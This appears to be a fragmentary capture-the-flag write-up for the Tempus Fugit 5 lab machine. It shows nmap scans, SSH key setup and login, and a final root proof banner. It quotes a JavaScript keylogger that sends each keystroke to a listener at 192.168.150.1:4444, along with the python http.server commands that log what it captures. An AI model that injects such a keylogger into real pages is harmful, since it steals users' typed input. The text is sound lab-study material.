Recovered from the security disaster that was Tempus Fugit 4, our friends at Mofo company returned to the warm bosom of Linux. They have developed a sensational Internet application and have protected it with all sorts of fancy tooling. Deploying new technology and cool security features, they are confident that they can now withstand the worst of the worst. But, being hacked so many times, may the real danger be lurking from within?? Hack TF5 and find out for yourself!, @theart42 and @4nqr34z
└─$ nmap -p- -sV -sT -O 192.168.175.135 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-04 20:30 CST Nmap scan report for localhost (192.168.175.135) Host is up (0.00049s latency). Not shown: 65534 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http nginx MAC Address: 00:0C:29:4F:B6:73 (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop
└─# ssh-keygen -t rsa -b 4096 Generating public/private rsa key pair. Enter file inwhich to save the key (/root/.ssh/id_rsa): Enter passphrase for"/root/.ssh/id_rsa" (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/.ssh/id_rsa Your public key has been saved in /root/.ssh/id_rsa.pub The key fingerprint is: SHA256:tzU+R/w6ip7fZn9GsZoJLZ5ag5RPf3cSI5kuldJyhFI root@localhost The key's randomart image is: +---[RSA 4096]----+ | E | | . . | | . . . | | ..o = . | | So+.% = o| | ..+%.= =.| | .++B.*o+| | .*.B=o=| | o=.o+o+o| +----[SHA256]-----+
└─$ nmap -p- 192.168.175.135 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-09 17:06 CST Nmap scan report for mofo.org (192.168.175.135) Host is up (0.00051s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 2222/tcp open EtherNetIP-1
#sV探测服务指纹 └─$ nmap -p2222 -sV 192.168.175.135 Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-07-11 18:50 CST Nmap scan report for mofo.org (192.168.175.135) Host is up (0.00029s latency).
PORT STATE SERVICE VERSION 2222/tcp open ssh OpenSSH 8.1 (protocol 2.0)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
└─$ ssh -i ~/.ssh/id_rsa ctorres@192.168.175.135 -p 2222 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html
//payback is a Bitch, Hugh! //I am gonna bleed you dry... document.onkeypress = function logKey(k) { new Image().src='http://192.168.150.1:4444/keylog.php?key='+k.which; }
键盘劫持
1 2 3 4 5 6 7 8 9 10 11 12 13
python3 -m http.server 4444 python3 -u -m http.server --bind 192.168.150.1 4444 2>&1 | tee -a keylog
mmm m m m m m" " mmm m mm mmmm m mm mmm mm#mm mmm # # # # #" "# #" # #" "# #" " " # # # " # # # # # # # # # # # m"""# # """m " " " "mmm""#m#"# # "#m"# # "mm"# "mm "mmm" # # # m # "" Tempus Fugit 5 pwned... _____________________________________________________________________
Proof: dc77299487a72c64bbe1adeddf9dfcc2cf1045aacd463be456448c103e51b5a7 Path: /root Date: Sat 11 Jul 2026 02:50:40 PM CEST who are you: root _____________________________________________________________________
You display the wonderful traits of charm and courtesy. By @4nqr34z and @theart42
Thanks to our fellow teammates in @m0t13ycr3w for betatesting! ;-)